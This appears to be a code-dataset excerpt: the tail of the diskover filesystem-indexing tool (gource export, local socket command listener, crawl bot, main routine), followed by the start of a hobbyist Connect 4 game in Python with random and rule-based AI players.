convert_size(total_file_size_skipped)))\n\n elif stats_type is 'updating_dupe':\n sys.stdout.write(\"\\n\\033[%s********************************* \\\nDUPES STATS *********************************\\033[0m\\n\" % BANNER_COLOR)\n sys.stdout.write(\"\\033[%s Files checked: %s \\\n(%s filehash groups)\\033[0m\\n\" % (BANNER_COLOR, dupe_count, total_hash_groups))\n sys.stdout.write(\"\\033[%s Duplicates tagged: \\\n%s\\033[0m\\n\" % (BANNER_COLOR, total_dupes))\n\n sys.stdout.write(\"\\033[%s Elapsed time: \\\n%s\\033[0m\\n\" % (BANNER_COLOR, get_time(elapsedtime)))\n sys.stdout.write(\"\\033[%s******************************************\\\n*************************************\\033[0m\\n\\n\" % BANNER_COLOR)\n sys.stdout.flush()\n\n\ndef gource():\n \"\"\"This is the gource visualization function.\n It uses the Elasticsearch scroll api to get all the data\n for gource.\n \"\"\"\n\n if CLIARGS['gourcert']:\n data = {\n \"sort\": {\n \"indexing_date\": {\n \"order\": \"asc\"\n }\n }\n }\n elif CLIARGS['gourcemt']:\n data = {\n \"sort\": {\n \"last_modified\": {\n \"order\": \"asc\"\n }\n }\n }\n\n # refresh index\n ES.indices.refresh(index=CLIARGS['index'])\n # search ES and start scroll\n res = ES.search(index=CLIARGS['index'], doc_type='file', scroll='1m',\n size=100, body=data, request_timeout=CONFIG['es_timeout'])\n\n while res['hits']['hits'] and len(res['hits']['hits']) > 0:\n for hit in res['hits']['hits']:\n if CLIARGS['gourcert']:\n # convert date to unix time\n d = str(int(time.mktime(datetime.strptime(\n hit['_source']['indexing_date'],\n '%Y-%m-%dT%H:%M:%S.%f').timetuple())))\n u = str(hit['_source']['indexing_thread'])\n t = 'A'\n elif CLIARGS['gourcemt']:\n d = str(int(time.mktime(datetime.strptime(\n hit['_source']['last_modified'],\n '%Y-%m-%dT%H:%M:%S').timetuple())))\n u = str(hit['_source']['owner'])\n t = 'M'\n f = str(hit['_source']['path_parent'] + \"/\" +\n hit['_source']['filename'])\n output = d + '|' + u + '|' + t + '|' + f\n try:\n # output for gource\n sys.stdout.write(output + '\\n')\n sys.stdout.flush()\n except Exception:\n sys.exit(1)\n if CLIARGS['gourcert']:\n # slow down output for gource\n time.sleep(CONFIG['gource_maxfilelag'])\n\n # get ES scroll id\n 
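# Note: each line emitted above follows gource's custom log format,\n        # 'timestamp|username|type|path', with type A (added) or M (modified), so the index\n        # can be visualized by piping stdout into gource, e.g. (exact flags may vary with\n        # gource version):\n        #     python diskover.py -i diskover-myindex --gourcemt | gource --log-format custom -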
scroll_id = res['_scroll_id']\n\n # use ES scroll api\n res = ES.scroll(scroll_id=scroll_id, scroll='1m',\n request_timeout=CONFIG['es_timeout'])\n\n\ndef run_command(threadnum, command_dict, clientsock, lock):\n \"\"\"This is the run command function.\n It runs commands from the listener socket\n using values in command_dict.\n \"\"\"\n global socket_tasks\n global clientlist\n\n # try to get index name from command or use from config file\n try:\n index = command_dict['index']\n except KeyError:\n index = CONFIG['index']\n pass\n # try to get threads from command or use default\n try:\n threads = str(command_dict['threads'])\n except KeyError:\n threads = str(CLIARGS['threads'])\n pass\n\n try:\n action = command_dict['action']\n pythonpath = CONFIG['listener_python_path']\n diskoverpath = CONFIG['listener_diskover_path']\n\n # set up command for different action\n if action == 'crawl':\n path = command_dict['path']\n cmd = [\n pythonpath, '-u', diskoverpath, '-t', threads,\n '-i', index, '-d', path, '--progress']\n\n elif action == 'finddupes':\n cmd = [\n pythonpath, '-u', diskoverpath, '-t', threads,\n '-i', index, '--finddupes', '--progress']\n\n elif action == 'reindex':\n try:\n recursive = command_dict['recursive']\n except KeyError:\n recursive = 'false'\n pass\n path = command_dict['path']\n if recursive == 'true':\n cmd = [\n pythonpath, '-u', diskoverpath, '-t', threads,\n '-i', index, '-d', path, '-R', '--progress']\n else:\n cmd = [\n pythonpath, '-u', diskoverpath, '-t', threads,\n '-i', index, '-d', path, '-r', '--progress']\n\n elif action == 'dirsize':\n try:\n path = command_dict['path']\n except KeyError:\n path = None\n pass\n if path:\n cmd = [\n pythonpath, '-u', diskoverpath, '-t', threads,\n '-i', index, '-S', path, '--progress']\n else:\n cmd = [\n pythonpath, '-u', diskoverpath, '-t', threads,\n '-i', index, '-S', '--progress']\n\n elif action == 'kill':\n taskid = command_dict['taskid']\n LOGGER.info(\"[thread-%s]: Kill task message received! 
(taskid:%s)\",\n threadnum, taskid)\n message = b'{\"msg\": \"exit\"}\\n'\n clientsock.send(message)\n LOGGER.debug(message)\n return\n\n else:\n LOGGER.warning(\"Unknown action\")\n message = b'{\"msg\": \"error\"}\\n'\n clientsock.send(message)\n LOGGER.debug(message)\n return\n\n # run command using subprocess\n starttime = time.time()\n taskid = str(uuid.uuid4()).encode('utf-8')\n\n # start process\n process = Popen(cmd, stdout=PIPE)\n # add process to socket_tasks dict\n with lock:\n socket_tasks[taskid] = process\n\n message = b'{\"msg\": \"taskid\", \"id\": \"%s\"}\\n' % taskid\n clientsock.send(message)\n LOGGER.debug(message)\n\n LOGGER.info(\"[thread-%s]: Running command (taskid:%s)\",\n threadnum, taskid)\n LOGGER.info(cmd)\n # send each stdout line to client\n while True:\n nextline = process.stdout.readline()\n if nextline != b'\\n' and nextline != b'':\n message = nextline + '\\n'.encode('utf-8')\n clientsock.send(nextline)\n LOGGER.debug(nextline)\n else:\n break\n\n # send exit msg to client\n output = process.communicate()[0]\n exitcode = str(process.returncode).encode('utf-8')\n elapsedtime = str(get_time(time.time() - starttime)).encode('utf-8')\n LOGGER.info(\"Command exit code: %s, elapsed time: %s\"\n % (exitcode, elapsedtime))\n message = b'{\"msg\": \"exit\", \"exitcode\": %s, \"elapsedtime\": \"%s\"}\\n' % (exitcode, elapsedtime)\n clientsock.send(message)\n LOGGER.debug(message)\n\n except KeyError:\n LOGGER.warning(\"Invalid command\")\n message = b'{\"msg\": \"error\"}\\n'\n clientsock.send(message)\n LOGGER.debug(message)\n pass\n\n except socket.error as e:\n LOGGER.error(\"[thread-%s]: Socket error (%s)\" % (threadnum, e))\n pass\n\n\ndef socket_thread_handler(threadnum, q, lock):\n \"\"\"This is the socket thread handler function.\n It runs the command msg sent from client.\n \"\"\"\n BUFF = 1024\n while True:\n try:\n c = q.get()\n clientsock, addr = c\n LOGGER.debug(clientsock)\n LOGGER.debug(addr)\n data = clientsock.recv(BUFF)\n LOGGER.debug(data)\n if not data:\n # close connection to client\n clientsock.close()\n LOGGER.info(\"[thread-%s]: %s closed connection\"\n % (threadnum, str(addr)))\n q.task_done()\n continue\n # check if ping msg\n elif data == b'ping':\n LOGGER.info(\"[thread-%s]: Got ping from %s\"\n % (threadnum, str(addr)))\n # send pong reply\n message = b'pong'\n clientsock.send(message)\n LOGGER.debug(message)\n else:\n LOGGER.info(\"[thread-%s]: Got command from %s\"\n % (threadnum, str(addr)))\n # get JSON command\n LOGGER.debug(data)\n # load json and store in dict\n command_dict = json.loads(data.decode('utf-8'))\n LOGGER.debug(command_dict)\n # run command from json data\n run_command(threadnum, command_dict, clientsock, lock)\n\n # close connection to client\n clientsock.close()\n LOGGER.info(\"[thread-%s]: %s closed connection\"\n % (threadnum, str(addr)))\n q.task_done()\n\n except (ValueError, TypeError) as e:\n LOGGER.warning(\"[thread-%s]: Invalid JSON from %s: (%s)\"\n % (threadnum, str(addr), e))\n message = b'{\"msg\": \"error\"}\\n'\n clientsock.send(message)\n LOGGER.debug(message)\n # close connection to client\n clientsock.close()\n LOGGER.info(\"[thread-%s]: %s closed connection\"\n % (threadnum, str(addr)))\n q.task_done()\n pass\n\n except socket.error as e:\n LOGGER.error(\"[thread-%s]: Socket error (%s)\" % (threadnum, e))\n # close connection to client\n clientsock.close()\n LOGGER.info(\"[thread-%s]: %s closed connection\"\n % (threadnum, str(addr)))\n q.task_done()\n pass\n\n\ndef start_socket_server():\n 
\"\"\"This is the start socket server function.\n It opens a socket and waits for remote commands.\n \"\"\"\n global clientlist\n\n # set thread/connection limit\n max_connections = 5\n\n # Queue for socket threads\n q = Queue.Queue(maxsize=max_connections)\n lock = threading.RLock()\n\n try:\n # create TCP socket object\n serversock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n serversock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n\n host = CONFIG['listener_host'] # default is localhost\n port = CONFIG['listener_port'] # default is 9999\n\n # bind to port\n serversock.bind((host, port))\n\n # start listener\n serversock.listen(max_connections)\n\n threads = []\n # set up the threads and start them\n for i in range(max_connections):\n # create thread\n t = threading.Thread(target=socket_thread_handler, args=(i, q, lock))\n t.daemon = True\n t.start()\n threads.append(t)\n\n while True:\n LOGGER.info(\"Waiting for connection, listening on %s port %s TCP\"\n % (str(host), str(port)))\n # establish connection\n clientsock, addr = serversock.accept()\n LOGGER.debug(clientsock)\n LOGGER.debug(addr)\n LOGGER.info(\"Got a connection from %s\" % str(addr))\n # add client to list\n client = [clientsock, addr]\n clientlist.append(client)\n # add task to Queue\n q.put(client)\n\n except socket.error as e:\n serversock.close()\n LOGGER.error(\"Error opening socket (%s)\" % e)\n sys.exit(1)\n\n except KeyboardInterrupt:\n print('\\nCtrl-c keyboard interrupt received, closing socket')\n q.join()\n serversock.close()\n sys.exit(0)\n\n\ndef log_setup():\n \"\"\"This is the log set up function.\n It configures log output for diskover.\n \"\"\"\n diskover_logger = logging.getLogger('diskover')\n diskover_logger.setLevel(logging.INFO)\n es_logger = logging.getLogger('elasticsearch')\n es_logger.setLevel(logging.WARNING)\n urllib3_logger = logging.getLogger('urllib3')\n urllib3_logger.setLevel(logging.WARNING)\n requests_logger = logging.getLogger('requests')\n requests_logger.setLevel(logging.WARNING)\n logging.addLevelName(\n logging.INFO, \"\\033[1;32m%s\\033[1;0m\"\n % logging.getLevelName(logging.INFO))\n logging.addLevelName(\n logging.WARNING, \"\\033[1;31m%s\\033[1;0m\"\n % logging.getLevelName(logging.WARNING))\n logging.addLevelName(\n logging.ERROR, \"\\033[1;41m%s\\033[1;0m\"\n % logging.getLevelName(logging.ERROR))\n logging.addLevelName(\n logging.DEBUG, \"\\033[1;33m%s\\033[1;0m\"\n % logging.getLevelName(logging.DEBUG))\n logformatter = '%(asctime)s [%(levelname)s][%(name)s] %(message)s'\n loglevel = logging.INFO\n logging.basicConfig(format=logformatter, level=loglevel)\n if CLIARGS['verbose']:\n diskover_logger.setLevel(logging.INFO)\n es_logger.setLevel(logging.INFO)\n urllib3_logger.setLevel(logging.INFO)\n requests_logger.setLevel(logging.INFO)\n if CLIARGS['debug']:\n diskover_logger.setLevel(logging.DEBUG)\n es_logger.setLevel(logging.DEBUG)\n urllib3_logger.setLevel(logging.DEBUG)\n requests_logger.setLevel(logging.DEBUG)\n if CLIARGS['quiet'] or CLIARGS['progress'] or \\\n CLIARGS['gourcert'] or CLIARGS['gourcemt']:\n diskover_logger.disabled = True\n es_logger.disabled = True\n urllib3_logger.disabled = True\n requests_logger.disabled = True\n\n # check if we want to run with verbose logging\n verbose = False\n if CLIARGS['verbose'] or CLIARGS['debug']:\n verbose = True\n\n return diskover_logger, verbose\n\n\ndef start_crawl_bot(dirlist):\n \"\"\"This is the crawl bot function.\n It uses dirlist which contains paths and their mtimes\n and scans for any changes 
to directories in that list\n    and updates directories which have newer mtime.\n    \"\"\"\n    global total_dirs\n\n    LOGGER.info('diskover crawl bot starting up')\n    LOGGER.info('randomly scanning for changes every %s sec', CONFIG['botsleep'])\n    LOGGER.info('*** press Ctrl-c to shutdown ***')\n\n    try:\n        i = len(dirlist) - 1\n        t = time.time()\n        c = 0\n        n = 1\n        last_path = ''\n        while True:\n            if (time.time() - t >= 60):\n                t = get_time(time.time() - STARTTIME)\n                # display stats if 1 min elapsed\n                LOGGER.info('### crawlbot stats: %s dirs checked (%s dir/s), %s dirs updated, running for %s ###',\n                            n, round(n / 60, 1), c, t)\n                t = time.time()\n                n = 1\n                total_dirs = 0\n            li = randint(0, i)\n            path = dirlist[li][1]\n            mtime_utc = dirlist[li][2]\n            # pick a new path if same as last time\n            if path == last_path:\n                continue\n            last_path = path\n            if VERBOSE:\n                LOGGER.info('checking %s', path)\n            try:\n                mtime_now_utc = time.mktime(time.gmtime(os.lstat(path).st_mtime))\n            except (IOError, OSError):\n                if VERBOSE:\n                    LOGGER.error('Error crawling directory %s', path, exc_info=True)\n                continue\n            if mtime_now_utc != mtime_utc:\n                c += 1\n                LOGGER.info('*** mtime changed! reindexing directory ***')\n                # delete existing path docs\n                index_delete_path(path, crawlbot=True)\n                # reindex path\n                worker_setup_crawl(path, crawlbot=True)\n                if CLIARGS['dirsize']:\n                    dirlist_path = index_get_docs('directory', path)\n                    # update directory size\n                    worker_setup_dirsizes(dirlist_path, crawlbot=True)\n            time.sleep(CONFIG['botsleep'])\n            n += 1\n    except KeyboardInterrupt:\n        print('\\nCtrl-c keyboard interrupt received, exiting')\n        sys.exit(0)\n\n\nif __name__ == \"__main__\":\n    # load config file into CONFIG dictionary\n    CONFIG = load_config()\n\n    # parse cli arguments into CLIARGS dictionary\n    CLIARGS = vars(parse_cli_args(CONFIG['index']))\n\n    # load any available plugins\n    plugins = load_plugins()\n\n    # list plugins\n    if CLIARGS['listplugins']:\n        print(\"diskover plugins:\")\n        list_plugins()\n        sys.exit(0)\n\n    # check index name\n    if CLIARGS['index'] == \"diskover\" or \\\n            CLIARGS['index'].split('-')[0] != \"diskover\":\n        print('Please name your index: diskover-')\n        sys.exit(0)\n\n    if not CLIARGS['gourcert'] and not CLIARGS['gourcemt']:\n        # check we are root\n        if os.geteuid():\n            print('Please run as root')\n            sys.exit(1)\n\n    if not CLIARGS['quiet'] and not CLIARGS['progress'] and \\\n            not CLIARGS['gourcert'] and not CLIARGS['gourcemt']:\n        # print random banner\n        print_banner()\n\n    # set up logging\n    LOGGER, VERBOSE = log_setup()\n\n    # check for listen socket cli flag\n    if CLIARGS['listen']:\n        start_socket_server()\n        sys.exit(0)\n\n    # print plugins\n    plugins_list = \"\"\n    for i in get_plugins_info():\n        plugins_list = plugins_list + i[\"name\"] + \" \"\n    if plugins:\n        LOGGER.info(\"Plugins loaded: %s\", plugins_list)\n\n    # connect to Elasticsearch\n    ES = elasticsearch_connect()\n\n    # check for gource cli flags\n    if CLIARGS['gourcert'] or CLIARGS['gourcemt']:\n        try:\n            gource()\n        except KeyboardInterrupt:\n            print('\\nCtrl-c keyboard interrupt received, exiting')\n            sys.exit(0)\n\n    # check if directory exists\n    if CLIARGS['rootdir']:\n        if not os.path.exists(CLIARGS['rootdir']) or not \\\n                os.path.isdir(CLIARGS['rootdir']):\n            LOGGER.error(\"Rootdir path not found or not a directory, exiting\")\n            sys.exit(1)\n        else:\n            # get absolute path\n            path = os.path.abspath(CLIARGS['rootdir'])\n            # remove any trailing slash unless root /\n            if path != '/':\n                path = path.rstrip(os.path.sep)\n    # check if file exists if only indexing single file\n    elif 
CLIARGS['file']:\n # check if file exists\n if not os.path.exists(CLIARGS['file']):\n LOGGER.error(\"File not found, exiting\")\n sys.exit(1)\n\n LOGGER.debug('Excluded files: %s', CONFIG['excluded_files'])\n LOGGER.debug('Excluded dirs: %s', CONFIG['excluded_dirs'])\n\n # check if we are just indexing single file -f option\n if CLIARGS['file']:\n try:\n path = os.path.abspath(os.path.join(CLIARGS['file'], os.pardir))\n name = os.path.basename(CLIARGS['file'])\n # create instance using scandir class\n entry = GenericDirEntry(path, name)\n # index file in Elasticsearch\n get_file_meta(0, entry, [], singlefile=True)\n sys.exit(0)\n except KeyboardInterrupt:\n print('\\nCtrl-c keyboard interrupt received, exiting')\n sys.exit(0)\n\n # Set up Queue and lock for worker threads\n if CLIARGS['breadthfirst']:\n q = Queue.PriorityQueue(maxsize=1000)\n else:\n q = Queue.Queue(maxsize=1000)\n lock = threading.RLock()\n\n # tag duplicate files if cli argument\n if CLIARGS['finddupes']:\n # Set up worker threads for duplicate file checker queue\n worker_setup_dupes()\n if not CLIARGS['quiet'] and not CLIARGS['progress']:\n sys.stdout.write('\\n')\n sys.stdout.flush()\n LOGGER.info('Finished checking for dupes')\n print_stats(stats_type='updating_dupe')\n # exit we're all done!\n sys.exit(0)\n\n # start crawlbot if cli argument\n if CLIARGS['crawlbot']:\n dirlist = index_get_docs('directory')\n start_crawl_bot(dirlist)\n sys.exit(0)\n\n # calculate dir sizes if cli argument\n if CLIARGS['dirsize']:\n if CLIARGS['dirsize'] is \"all\":\n # look in ES for all directory docs and add to queue\n dirlist = index_get_docs('directory')\n else:\n # use directory from cli arg\n fp = os.path.abspath(CLIARGS['dirsize']).rstrip(os.path.sep)\n dirlist = index_get_docs('directory', fp)\n # Set up worker threads for calculating dir sizes\n worker_setup_dirsizes(dirlist)\n if not CLIARGS['quiet'] and not CLIARGS['progress']:\n sys.stdout.write(\"\\n\")\n sys.stdout.flush()\n LOGGER.info('Finished updating directory sizes')\n sys.exit(0)\n\n # copy tags from index2 to index if cli argument\n if CLIARGS['copytags']:\n # look in ES for all directory docs and add to queue\n dirlist = index_get_docs('directory')\n # look in ES for all file docs and add to queue\n filelist = index_get_docs('file')\n # Set up worker threads for collecting tags\n worker_setup_copytags(dirlist, filelist)\n if not CLIARGS['quiet'] and not CLIARGS['progress']:\n sys.stdout.write(\"\\n\")\n sys.stdout.flush()\n LOGGER.info('Finished copying tags')\n sys.exit(0)\n\n # create Elasticsearch index\n index_create()\n\n # check if we are reindexing and remove existing docs in Elasticsearch\n if CLIARGS['reindex']:\n index_delete_path(path)\n elif CLIARGS['reindexrecurs']:\n index_delete_path(path, recursive=True)\n\n # Set up worker threads and start crawling from top rootdir path\n worker_setup_crawl(path)\n\n # Calculate directory sizes and print stats\n if not CLIARGS['quiet'] and not CLIARGS['progress']:\n sys.stdout.write(\"\\n\")\n sys.stdout.flush()\n LOGGER.info('Finished crawling')\n print_stats(stats_type='crawl')\n # exit, we're all done!\n sys.exit(0)\n","sub_path":"diskover.py","file_name":"diskover.py","file_ext":"py","file_size_in_byte":104773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"401971548","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Feb 27 11:54:07 2018\r\n\r\nThis is my Connect 4 game.\r\n\r\nWhat it *should* do:\r\n ~ The player has a choice of playing 
against another human, which is convenient for testing edge\r\n cases.\r\n ~ The player can choose between a dumb AI that picks a column at random, or;\r\n ~ The player can choose a 'smart' AI that is a little more descerning in it's choices. For\r\n details, see the relevant classes.\r\n ~ The player can choose a board size from 1 x 1 to 15 x 15.\r\n ~ The player can pick their name.\r\n ~ The player can choose whether to go first or second.\r\nWhat it will NOT do:\r\n ~ This is Connect 4, not Connect 5, Connect 3 or Connect 1,000,000\r\n ~ The player cannot name the AI.\r\n ~ The player cannot change any colors on the board, or add additional players.\r\n \r\nThe program *should* run fine in Spyder3. But for a better experience, run in the command line. The\r\ndisplay tends to freeze for a few seconds at the start if run on Spyder. I set my line widths to 100\r\nso if you're having any wrapping issues, that could be why.\r\n\r\n\"\"\"\r\n# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n# ==================================================================================================\r\n# IMPORT STATEMENTS\r\n# ==================================================================================================\r\n# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n\r\nimport numpy as np\r\nimport random\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.animation as animation\r\nfrom matplotlib import style\r\nstyle.use('classic') # The best kind of style.\r\n\r\n\r\n# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n# ==================================================================================================\r\n# MAIN GAME\r\n# ==================================================================================================\r\n# \r\n# The main game consists of 5 classes:\r\n# 1. Board\r\n# 2. HumanPlayer\r\n# 3. StupidMachinePlayer\r\n# 4. NonStupidMachinePlayer\r\n# 5. Game\r\n# Originally intended to be stand alone, and it is to a certain extent, but in order to use some of\r\n# the fancy graph functions, I had to embed function calls within this class. So if this class is to\r\n# be fully stand alone, those function calls need to be commented out. I have highlighted these\r\n# calls with # ***.\r\n# ==================================================================================================\r\n# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n\r\nclass Board:\r\n \"\"\"Defines the board class. 
\r\n Attr: board\r\n \"\"\" \r\n def __init__(self, columns, rows):\r\n \"\"\"Initializer for the Board class\"\"\"\r\n self.rows = rows\r\n self.columns = columns\r\n self.board = np.zeros((rows, columns))\r\n \r\n def __str__(self):\r\n \"\"\"string representation of the board.\"\"\"\r\n string = \"\"\r\n for row in self.board:\r\n string += str(row) + '\\n'\r\n return string\r\n \r\n def change_board(self, column, symbol):\r\n \"\"\"Updates the board to reflect the most recent move.\"\"\"\r\n if symbol == 'B':\r\n modifier = 1\r\n else:\r\n modifier = -1\r\n column_array = self.board[:,column]\r\n flipped_column = np.flip(column_array, 0)\r\n i = 0\r\n while i < self.rows:\r\n if flipped_column[i] == 0.0:\r\n self.board[self.rows-1-i][column] = modifier\r\n break\r\n else:\r\n i += 1\r\n \r\n def create_sub_arrays(self, size):\r\n \"\"\"Called by the is_win() method to break up the main board into 4x4\r\n sub-arrays.\"\"\"\r\n row_start = 0\r\n sub_boards = [] \r\n while row_start < ROWS-(size-1):\r\n col_start = 0\r\n while col_start < COLS-(size-1):\r\n sub_board = self.board[row_start:row_start+size, col_start:col_start+size]\r\n sub_boards.append(sub_board)\r\n col_start += 1\r\n row_start += 1\r\n return sub_boards\r\n \r\n def is_win(self, number):\r\n \"\"\"Searches the boards for wins.\"\"\"\r\n sub_boards = self.create_sub_arrays(number)\r\n win = False\r\n # diagonals\r\n for sub_board in sub_boards:\r\n if np.trace(sub_board) == number or np.trace(sub_board) == -number:\r\n return True\r\n flipped = np.fliplr(sub_board)\r\n if np.trace(flipped) == number or np.trace(flipped) == -number:\r\n return True\r\n # rows\r\n for row in sub_board:\r\n if sum(row) == number or sum(row) == -number:\r\n return True\r\n # columns\r\n for row in sub_board.transpose():\r\n if sum(row) == number or sum(row) == -number:\r\n return True\r\n return win\r\n\r\n def is_full(self, column):\r\n \"\"\"Checks to see if a column is full. Returns True if full, False, otherwise.\"\"\"\r\n result = False\r\n if 0. not in self.board.transpose()[column]:\r\n result = True\r\n return result\r\n \r\n \r\nclass HumanPlayer:\r\n \"\"\"Defines the player class. \r\n Attr: symbol\r\n name\r\n \"\"\"\r\n \r\n def __init__(self, name, symbol):\r\n \"\"\"Initializer for the Player class.\"\"\"\r\n self.name = name\r\n self.symbol = symbol\r\n \r\n def get_move(self, board):\r\n \"\"\"Takes raw input from the player and returns the column number.\r\n will only allow integers between 0 and 6.\"\"\"\r\n result = None\r\n while result is None:\r\n prompt = \"please enter a column number: \"\r\n try:\r\n column = int(input(self.name + ', ' + prompt))\r\n if (1 <= column <= COLS) and board.is_full(column-1) is False:\r\n return column - 1\r\n else:\r\n raise ValueError\r\n except ValueError: \r\n print(\"\\n\" + (\"=\" * 69))\r\n print(\"INVALID COLUMN NUMBER!\")\r\n print(\"=\" * 69)\r\n\r\n\r\nclass StupidMachinePlayer:\r\n \"\"\"Defines the StupidMachinePlayer class. 
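# --- editor's sketch: the diagonal-win test used by Board.is_win above ---
# Discs are encoded as +1/-1, so four equal discs on a diagonal of a 4x4
# window sum to +/-4; np.trace reads the main diagonal, and np.fliplr followed
# by np.trace reads the anti-diagonal. A standalone version (names illustrative):
import numpy as np

def window_has_diagonal_win(window, n=4):
    # window: an n x n slice of the board holding +1, -1 or 0
    return (abs(np.trace(window)) == n
            or abs(np.trace(np.fliplr(window))) == n)

assert window_has_diagonal_win(np.eye(4))  # four +1 discs on the diagonal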
This AI will just go anywhere at random.\r\n Attr: symbol\r\n Name: Forrest\r\n \"\"\"\r\n \r\n def __init__(self, name, symbol):\r\n \"\"\"Initializer for the StupidMachinePlayerClass.\"\"\"\r\n self.symbol = symbol\r\n self.name = name\r\n \r\n def get_move(self, board):\r\n \"\"\"Get a random column.\"\"\"\r\n column = random.randint(0,board.columns - 1)\r\n while board.is_full(column): # We need to check and make sure that the column isn't full.\r\n column = random.randint(0, board.columns - 1)\r\n return column\r\n\r\n\r\n# =============================================================================\r\n# THE MAIN AI\r\n# This is one class that consists of a main function, get_move(), and helper functions to return the\r\n# results of searching the sub-arrays for matching lines. From looking at the helper fuctions,\r\n# I attempted to abstract a function from both, but I gave up after not being able to figure out\r\n# the errors. Similarly the rowfinder function is horrendous. This is because of the large number\r\n# cases that need to be considered - we need to check whether we're on the left edge, right edge,\r\n# bottom edge, and whether there are empty slots below the potential move location.\r\n# =============================================================================\r\n \r\nclass NonStupidMachinePlayer:\r\n \"\"\"Defines a machine player that doesn't play like Forrest Gump.\r\n Attr: symbol\r\n Name: Albert\r\n \"\"\"\r\n \r\n def __init__(self, name, symbol):\r\n \"\"\"Initializer for the NonStupidMachinePlayer.\"\"\"\r\n self.symbol = symbol\r\n self.name = name\r\n \r\n\r\n def get_move(self, board):\r\n \"\"\"The AI follows a set of instructions. It first checks whether it can make a row of\r\n three, then a column of three. Then it checks to see if the\r\n opponent can make a four anywhere on the next move. If these statements all come back\r\n false, then it goes to 2s. It doesn't check the diagonals. It's not that smart.\"\"\"\r\n move = self.row_finder(board, 3) # Check the threes\r\n if move is None:\r\n move = self.col_finder(board, 3)\r\n if move is None:\r\n move = self.row_finder(board, 3, opfor=True) # Check opponent threes\r\n if move is None:\r\n move = self.col_finder(board, 3, opfor=True)\r\n if move is None:\r\n move = self.row_finder(board, 2) # Check the twos\r\n if move is None:\r\n move = self.col_finder(board, 2)\r\n if move is None:\r\n move = self.row_finder(board, 2, opfor=True) # Check the opponent twos\r\n if move is None:\r\n move = self.col_finder(board, 2, opfor=True)\r\n if board.is_full(move):\r\n self.get_move(board)\r\n if move is None:\r\n move = random.randint(0,board.columns - 1)\r\n while board.is_full(move):\r\n move = random.randint(0, board.columns - 1) \r\n return move\r\n \r\n def col_finder(self, board, sub_size, opfor=False):\r\n \"\"\"Takes a board, specification of sub-array size, and whether we are seraching for the\r\n opponent's disks. 
Returns the position in the main array that the column starts at.\r\n \"\"\"\r\n sub_boards = board.create_sub_arrays(sub_size) # split main array into sub-arrays\r\n if opfor is True:\r\n target = (-1) * sub_size # look for opponents disk\r\n else:\r\n target = sub_size\r\n result = None\r\n moves = set() # moves are in a set to get rid of\r\n col_count = 0 # keep track of sub-arrays\r\n for sub in sub_boards:\r\n row_count = 0\r\n trans = sub.transpose() # transpose array\r\n for row in trans:\r\n if sum(row) == target:\r\n c = col_count\r\n r = row_count\r\n row_index = c // (COLS - sub_size + 1) # Converts the number of times\r\n col_index = c % (COLS - sub_size + 1) + r # iterated through the arrays, into\r\n moves.add((row_index, col_index)) # array coords. Kind of like finding\r\n row_count += 1 # the parent of tree node.\r\n col_count += 1\r\n for move in moves:\r\n row, column = move\r\n if board.board[row-1][column] == 0.:\r\n return column\r\n return result\r\n \r\n def row_finder(self, board, sub_size, opfor=False):\r\n \"\"\"Takes a board, sub_size, and whether we are searching for the opponent's disks. Returns\r\n the position in the main array that the column starts at.\"\"\"\r\n sub_boards = board.create_sub_arrays(sub_size) \r\n if opfor is True:\r\n target = (-1) * sub_size\r\n else:\r\n target = sub_size\r\n result = None\r\n moves = set()\r\n col_count = 0\r\n for sub in sub_boards:\r\n row_count = 0\r\n for row in sub:\r\n if sum(row) == target:\r\n c = col_count\r\n r = row_count\r\n row_index = c//(COLS - sub_size + 1) + r # Identify starting indices for 3-line\r\n col_index = c % (COLS - sub_size + 1)\r\n moves.add((row_index, col_index))\r\n row_count += 1\r\n col_count += 1\r\n # We now need to check if there is a valid move either side of each 3-line\r\n for move in moves:\r\n row, column = move\r\n right = column + sub_size # The position to the right of the line\r\n left = column - 1 # The position to the left of the line\r\n if row == ROWS - 1: # If we're on the bottom\r\n if left <= 0: # Far left\r\n if board.board[row][right] == 0.:\r\n return right\r\n elif right == COLS: # Far right\r\n if board.board[row][left] == 0.:\r\n return left\r\n else: # In the middle of the board\r\n if board.board[row][left] == 0.:\r\n return left\r\n elif board.board[row][right] == 0.:\r\n return right\r\n else:\r\n if right == COLS:\r\n if board.board[row][left] == 0. and board.board[row+1][left] != 0.:\r\n return left\r\n elif left < 0:\r\n if board.board[row][right] == 0. and board.board[row+1][right] != 0.:\r\n return right\r\n else:\r\n if board.board[row][left] == 0. and board.board[row+1][left] != 0.:\r\n return left\r\n elif board.board[row][right] == 0. and board.board[row+1][right] != 0.:\r\n return right \r\n return result\r\n \r\n \r\n \r\nclass Game:\r\n \"\"\"Defines the Game class.\r\n Attr: player1\r\n player2\r\n current_player\r\n board\r\n \"\"\"\r\n \r\n def __init__(self, player1, player2, board):\r\n \"\"\"\"Initializer for the Game class.\"\"\"\r\n self.board = board\r\n self.player1 = player1\r\n self.player2 = player2\r\n self.current_player = player1\r\n \r\n def update_display_file(self): # ***\r\n \"\"\"Updates the save file with the current moves. 
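# --- editor's sketch: the flat-counter-to-coordinates math used above ---
# row_finder/col_finder recover board coordinates from the counter `c` that
# enumerates the sliding sub-arrays row by row. With W windows per board row
# (W = COLS - sub_size + 1), window c starts at (c // W, c % W):
def window_origin(c, cols, sub_size):
    w = cols - sub_size + 1  # windows per row of the board
    return c // w, c % w

# On a 7-column board with 4x4 windows (w = 4), window c=5 starts at (1, 1):
assert window_origin(5, 7, 4) == (1, 1)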
